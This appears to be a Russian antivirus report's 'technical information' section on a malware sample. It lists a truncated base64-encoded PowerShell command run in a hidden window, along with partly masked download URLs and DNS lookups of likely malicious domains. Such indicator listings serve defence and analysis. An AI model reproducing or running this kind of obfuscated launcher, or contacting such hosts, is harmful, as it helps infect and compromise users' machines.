Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABRAHkAbwBhAHEAcABxAGwAYwBzAHoAZABuAD0AJwBPAGYAdABiAGoAbwBhAGYAaABuAHUAagBqACcAOwAkAEQAcgB6AGMAbQBwAH...
- http://www.pr#####egroup-tr.com/wp-admin/j3c117/
- http://www.lo###that.com/cgi-bin/y90391/
- DNS ASK da#######ementor-layouts.com
- DNS ASK pr#####egroup-tr.com
- DNS ASK lo###that.com
- DNS ASK bi#####eofficial.com
- DNS ASK ol###rodd.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABRAHkAbwBhAHEAcABxAGwAYwBzAHoAZABuAD0AJwBPAGYAdABiAGoAbwBhAGYAaABuAHUAagBqACcAOwAkAEQAcgB6AGMAbQBwAH...' (со скрытым окном)